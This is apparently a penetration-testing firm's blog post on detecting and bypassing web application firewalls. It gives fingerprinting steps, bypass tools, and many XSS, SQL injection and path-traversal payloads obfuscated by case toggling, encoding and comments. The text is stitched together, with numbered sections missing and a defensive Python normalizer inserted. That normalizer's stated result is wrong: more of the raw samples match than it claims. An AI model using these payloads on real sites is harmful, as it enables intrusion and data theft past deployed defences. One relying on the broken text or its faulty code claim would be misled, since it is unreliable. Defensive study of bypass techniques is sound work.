A web application firewall (WAF) is a set of monitors and filters designed to detect and block network attacks on a web application. WAFs operate at the application layer of the OSI model.
The web application firewall is used as a security tool: in real time, it decides whether to grant or deny access.
Companies should be aware that a WAF is not a full-fledged information protection tool. Usually it is one element of the overall security system of a web application, alongside components that handle protocols other than HTTP/HTTPS, incident management systems, and anti-fraud services.
When conducting a penetration test, we first identify the real IP address, enumerate the WAF vendor, and try to bypass the WAF. Once the defense is broken through, the most interesting part begins: everything the client wanted to hide behind the WAF provides room for further penetration testing.
How many times have we bypassed such protection? It is shocking that every second site is vulnerable to these bypass methods and techniques. Since WAF vendors try to maintain static regexp lists to trigger the WAF, hackers find new ways to bypass this protection by masking payloads. There are almost no locks that cannot be broken with a crowbar. Therefore, we see an endless game of cat and mouse: hackers against WAFs.
So, a summary of reasons for using a WAF:
Defense in Depth approach.
Detects and blocks attacks against vulnerable web applications.
SPF and TXT records might contain the IP address of an origin server that is not behind Cloudflare.
3. Also, check securitytrails.com: the Historical Data field might show the original IP in old records.
How to prove that a WAF is set up correctly:
WAFs use the standard ports 80, 443, 8000, 8008, 8080, and 8088.
WAFs set their own cookies in requests.
WAFs associate themselves with separate headers.
WAFs expose themselves in the Server header.
WAFs expose themselves in the response content.
WAFs reply with unique response codes upon malicious requests.
Send a standard GET request from a browser, intercept it, and record the response headers (especially cookies).
Send a request from the command line (e.g., cURL), then check the response content and headers.
Send GET requests to random open ports and check banners that might expose the WAF's identity.
Try some SQL injection payloads like ' or 1 = 1 ' in login forms or password-reset forms.
Try noisy XSS payloads like <script>confirm()</script> in some input fields.
Try adding ../../../etc/passwd to a random parameter in the URL.
Add payloads like ' OR SLEEP(5) OR ' at the end of URLs, in any random parameter.
Send GET requests with outdated protocols like HTTP/0.9 (HTTP/0.9 does not support POST requests).
Check the Server header upon different types of interactions.
Send a raw crafted FIN&RST packet to the server and observe the response.
Side-channel attacks: examine the timing behavior of the request and the response content.
Most hackers use automated tools to speed up the process of bypassing WAFs on resources of interest to them. We have compiled a small list of tools that hackers use every day. Using these tools is only the first step in checking what is exposed to hackers. Always do regular penetration tests, since WAFs update their rule bases every day and the ways to get around them change as well. But hackers do not sleep either, and every day they look for new ways to bypass WAFs.
It is very good when companies do penetration tests and participate in bug bounty programs, which allow them to attract thousands of white-hat hackers to their side and jointly fix the mistakes made by developers and WAFs.
Tools to Check and Bypass WAFs:
w3af - Web Application Attack and Audit Framework
wafw00f - Identify and fingerprint Web Application Firewalls
BypassWAF - Bypass firewalls by abusing DNS history. This tool searches for old DNS A records and checks whether the server replies for that domain.
CloudFail - A tactical reconnaissance tool that tries to find the original IP address behind the Cloudflare WAF.
Techniques to bypass WAF:
1. Case Toggling Technique
Combine upper- and lower-case characters to create effective payloads.
Basic Request:
<script>confirm()</script>
Bypassed Technique:
<ScrIpT>confirm()</sCRiPt>
Basic Request:
SELECT * FROM * WHERE OWNER = 'NAME_OF_DB'
Bypassed Technique:
sELeCt * fRoM * wHerE OWNER = 'NAME_OF_DB'
Example in URL:
http://example.com/index.php?page_id=-1 UnIoN SeLeCT 1,2,3,4
2. URL Encoding Technique
Encode normal payloads with percent (URL) encoding.
Such rules often tend to filter out only a specific type of encoding.
Such filters can be bypassed with mixed-encoding payloads.
Newlines and tabs can further add to the obfuscation.
Obfuscated payload:
<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>
6. Using Comments Technique
Comments obfuscate standard payload vectors.
Different payloads have different ways of obfuscation.
Blocked by WAF:
<script>confirm()</script>
Bypassed Technique:
<!--><script>confirm/**/()/**/</script>
Blocked by WAF:
/?id=1+union+select+1,2--
Bypassed Technique:
/?id=1+un/**/ion+sel/**/ect+1,2--
Insert comments in the middle of attack strings. For instance, /*!SELECT*/ might be overlooked by the WAF but passed on to the target application and processed by a MySQL database.
Example in URL:
index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4
'union%a0select pass from users#
Example in URL:
index.php?page_id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
7. Double Encoding Technique
Web application firewall filters tend to encode characters to protect the web app.
Poorly developed filters (without recursive filters) can be bypassed with double encoding.
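As an added example (not code from the original post or from Hacken), the following Python normalizer shows the defender's side of techniques 1, 2, 6 and 7: the case-toggled, URL-encoded, comment-padded and double-encoded payloads quoted above are canonicalized before a static rule list is applied, so they collapse to the same form a plain request would take. The SAMPLES and RULES names are constructed for this illustration, and the code assumes Python 3.9+.

```python
import re
from urllib.parse import unquote

# Constructed samples, copied from the bypass techniques listed above.
SAMPLES = {
    "case_toggle_xss": "<ScrIpT>confirm()</sCRiPt>",
    "case_toggle_sql": "sELeCt * fRoM * wHerE OWNER = 'NAME_OF_DB'",
    "comment_xss": "<!--><script>confirm/**/()/**/</script>",
    "comment_sql": "/?id=1+un/**/ion+sel/**/ect+1,2--",
    "mixed_encoding_sql": "index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4",
    "nbsp_sql": "'union%a0select pass from users#",
    "versioned_comment_sql": "index.php?page_id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3",
    "double_encoded_xss": "%253Cscript%253Econfirm()%253C/script%253E",
}

# Lower-case signatures: a static list like this only works on canonical input.
RULES = {
    "xss_script_tag": re.compile(r"<\s*script\b"),
    "sql_union_select": re.compile(r"\bunion\s*(all\s*)?select\b"),
    "sql_select_from": re.compile(r"\bselect\b.+\bfrom\b"),
}

def normalize(value: str, max_rounds: int = 3) -> str:
    """Canonicalize a request value before signature matching."""
    current = value
    # 1. URL-decode until the string stops changing (defeats double encoding).
    #    latin-1 keeps %a0 as NBSP (use the application's real charset in production).
    for _ in range(max_rounds):
        decoded = unquote(current, encoding="latin-1")
        if decoded == current:
            break
        current = decoded
    # 2. MySQL executes the body of /*!...*/ and /*!50000...*/, so keep it.
    current = re.sub(r"/\*!\d*\s*(.*?)\s*\*/", r"\1", current, flags=re.S)
    # 3. Ordinary C-style and HTML comments carry no code: drop them.
    current = re.sub(r"/\*.*?\*/", "", current, flags=re.S)
    current = re.sub(r"<!-->|<!--.*?-->", "", current, flags=re.S)
    # 4. '+' is a space in query strings; NBSP, tabs and newlines all match \s.
    current = re.sub(r"\s+", " ", current.replace("+", " "))
    return current.lower().strip()

def match_rules(value: str) -> list[str]:
    """Names of the rules that fire on `value` exactly as given."""
    return [name for name, rx in RULES.items() if rx.search(value)]

def inspect(value: str) -> dict:
    """Show the difference between matching raw input and normalized input."""
    canon = normalize(value)
    return {"normalized": canon, "raw_hits": match_rules(value),
            "normalized_hits": match_rules(canon)}
```

Running inspect() over SAMPLES shows that the raw rules miss seven of the eight payloads, while every one of them is flagged after normalization.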
Let's summarize everything written above. Always think outside the box. Try different encoding techniques; some of them will work. Do not be lazy about checking DNS records, since it's the only way to succeed in bug bounty hunting.
Do not forget that any protection on web resources can be bypassed, and a WAF is not a panacea for all problems. Hackers do not sleep and are always looking for new techniques to attack your resources for profit. Regular penetration testing from Hacken experts, as well as participation in bug bounty programs on HackenProof, will help you avoid many problems. Check more at: https://wp.hacken.io/services/penetrationtesting/